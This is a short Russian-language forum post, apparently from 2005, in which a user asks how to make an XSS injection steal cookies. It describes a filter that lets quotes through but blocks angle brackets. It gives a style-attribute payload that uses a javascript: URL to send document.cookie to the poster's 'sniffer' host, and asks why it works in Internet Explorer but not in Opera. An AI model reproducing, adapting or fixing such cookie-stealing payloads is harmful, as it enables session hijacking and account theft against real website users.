PDA

Просмотр полной версии : Вопрос по Xss


Kihamo
07.03.2005, 03:33
Извеняюсь если не в тот раздел запостил, но по моему больше было некуда. Суть проблемы. Можно залить код типа

<a href='мои_данные'>мои данные</a>

Причем мои_данные пропускают кавычки и знак апострофа, знаки > < не пропускает. Цель - заставить выполнить скрипт параметры которого будут куки.
Я пробывал стандартно

'style='display:none;background:url(javascript:doc ument.images[2].src="снифер?"+document.cookie)

В ослике работает нормально, а в опере (тестил на 7) не пашет хоть убей. Как мона решить эту проблему?